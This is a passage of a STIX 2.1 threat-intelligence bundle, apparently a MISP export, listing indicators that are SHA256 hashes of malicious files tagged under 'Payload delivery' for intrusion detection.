"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '54e54c459dbe3224d3f4947b30f20b365224552afac4bd45ddadfacee9a7cbe2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64f3-5e60-4d86-8002-4d5f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '6b8b394add913d3c410787f0c711217fec60a917872465de04290a8003b73535']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64f4-3d68-44aa-bb0a-4ced950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '3977472c733eafb7e71f8fd6fece5d2cfc849ec88e9d6942082531f3f88818b2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64f5-a31c-49e8-92f1-4308950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b2faf0d9f8f436968f3851ae863f3b3d9190b1be5856f2bd044e6b04447efa2f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64f6-78ec-4b61-83f5-4886950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '53e4330ba988627e5f1f5544f23fae1c66c0f2d714a922b1130a1c9dc2efeda5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64f7-7eb0-47e6-b824-49e0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '2c5871fb46e6fbf95266830ba7b4923449d0bc99a4efd7586ff5556ca049ea1c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64f9-9830-4929-8ed6-42ee950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '20b2c347268546d317711aa693d078c0dcac247e486e3b87e45b099fabdff607']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64fa-0100-44b6-ac46-4f21950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'c8dee4c2212c7bf8eb9cd7635ff42526b17340fb198a801cdaa8d4ef72a3c1db']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64fb-8e60-4c65-a20b-42e1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'c3511e8d5de1ab2146ddb8ecc735890ef5cec0b31d175fca2fb2b88d60ec3e43']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64fc-f580-4e40-babe-4d9e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '947e55e3454031972cc3d11006a60091b2197cc9e241e562ed900b82e4f28bd9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64fd-f314-47e7-81f0-4f93950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'ba03da023f13796dd6dd70db0234da5df33ddc18ba274cdc62c282d56c695ece']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64fe-9044-43a9-9046-4d59950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'de3aa81710f2580d3ac690c1f6d087a4672f29ccaa36e3901e4904056f83a48d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64fe-5538-403d-abe4-4488950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b3f371cc899440583095bac2817fba2ae2c7c3cac9c121d0798e03730589ad33']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64ff-14b4-4812-915d-47e4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'daefdf3c053971d35eb4a7447cf74c0335066d557ddbe56f01611e8b9a38b512']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6500-3944-4172-9d0b-4c5e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '0dac129154c01867ca391da20227fdf7d7e3a9dd4cf42eac76833a051153794f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db694b-bad0-4a88-bc1f-44f5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'dd3ada0bb17356592e13bae5961c0bb131e645d2c957f1f2047cc25528f60518']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db694c-694c-4317-853b-4cba950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f94b5803298a18b6ddc5eab202db6ae4e7199adf298ce16698e8053a36d5f934']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db694d-ced0-4a90-aa26-46bb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '6e7cb2c05000d0e609cebdb7d598fffc48eb5e7d1d589fc0947e322cdcffa070']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db694e-8914-49ff-acc6-4d51950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'dfc6ff1c54d3b7c2d6aa3ab9573debfe83b2d9a82c20b765a852c77d792ab10e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db694f-ce48-425c-a1fc-41c2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'a0af21826f06da5292dfea3574648137292e31df1cd70a8262f03354dabfb38b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6950-153c-45d2-9ae3-4995950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '788222fe51e7bc91ce229f67557843db34e1ad68296069ed3235b022407fa610']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6950-1d98-4d84-91ba-4cec950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '858dc8648024588c644466e0386e101a925295f4b8ba3e3b7235aab7eee2788c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6951-ac78-4785-8144-4ff7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '25eb81fc61b60b1a01eafc040b292b8c206a883555d1db3b80103f6a09b92f7d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6952-3f38-4c6a-bc3f-461b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'a0ee38e7edac534827a1501bcc535ab7f604abfe654eb34b330ececc544cb084']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6953-e224-47c3-a633-4336950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'c870b4dffa82f8b60efaf7b98875e4f823a207dfb2f0023ca1700392ca91c5c0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6954-5a6c-4ea0-9776-4aad950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'cb677ce864730abb68cb007f5ce3cf067fa982d5ec5e79402f4dd28506f763c7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6955-5dfc-42a5-8f0e-4141950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '29c653c91fa209754ffdc7d5d450df1eacea065eb327943d613a5341d4d091b7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6956-b0a8-4698-a845-4164950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '0919a323113724b2e8734a3178996cedee88f827f7706423acf8407568a93bce']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6957-2d48-4a3a-af3d-4ecc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '4aceb41286ad09a78a31006e65c374fd82f3f0682592cfa1b06a390b4450404a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6958-260c-4991-9fb8-40f4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '8a1d7fe6146ad99ee806586f217e067cd34d5bff7dd44d516e08576c22b1a382']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6959-e204-4536-8d43-4119950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '6905b72571b27eb36191c5394fdb8aa91a25561e2f65bb7f6283cd67b8b42695']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db695a-efbc-4f04-baad-4cc2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'cd0fcb23fe5387245008d5aba8e9f937bae13da0f5319e4c0952a0e5f8715fca']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db695b-2f20-4953-9eae-4b58950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
